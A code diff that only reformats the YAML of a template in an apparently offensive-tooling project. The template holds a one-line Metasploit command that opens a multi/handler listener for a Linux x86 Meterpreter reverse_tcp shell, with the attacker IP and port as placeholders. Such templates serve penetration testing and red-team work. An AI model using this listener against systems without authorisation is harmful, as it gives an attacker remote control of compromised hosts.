--- a/src/profi/templates/scripts/listener-msf-multi-handler-linux-x86-meterpreter-staged.yaml
+++ b/src/profi/templates/scripts/listener-msf-multi-handler-linux-x86-meterpreter-staged.yaml
@@ -1,11 +1,9 @@
+---
 metadata:
-  filename: listener-msf-multi-handler-linux-x86-meterpreter-staged.yaml
-  tags:
-  - linux
-  - shell
-  created: '2025-03-29'
-  author: Unknown
-content: 'msfconsole -q -x "use exploit/multi/handler;set payload linux/x86/meterpreter/reverse_tcp;set
-  LHOST {{ attacker_ip }};set LPORT {{ shell_port }};run;"
+  filename: "listener-msf-multi-handler-linux-x86-meterpreter-staged.yaml"
+  tags: ["linux", "shell"]
+  created: "2025-03-29"
+  author: "Unknown"
 
-  '
+content: |
+  msfconsole -q -x "use exploit/multi/handler;set payload linux/x86/meterpreter/reverse_tcp;set LHOST {{ attacker_ip }};set LPORT {{ shell_port }};run;"
